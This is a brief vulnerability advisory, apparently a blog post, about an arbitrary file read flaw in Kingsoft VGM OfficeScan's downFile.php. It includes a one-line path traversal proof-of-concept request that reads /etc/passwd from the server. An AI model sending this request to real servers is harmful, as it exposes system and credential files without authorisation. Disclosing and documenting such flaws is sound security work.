Kingsoft Vgm Officescan Downfile Php Arbitrary File Reading Vulnerability
Kingsoft Vgm Officescan Downfile Php Arbitrary File Reading Vulnerability
Kingsoft VGM OfficeScan downFile.php arbitrary file reading vulnerability
Vulnerability Description
Kingsoft VGM OfficeScan downFile.php file has arbitrary file reading vulnerability, and attackers can obtain any file on the server through the vulnerability.
Vulnerability Impact
Kingsoft VGM OfficeScan
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/downFile.php?filename=../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.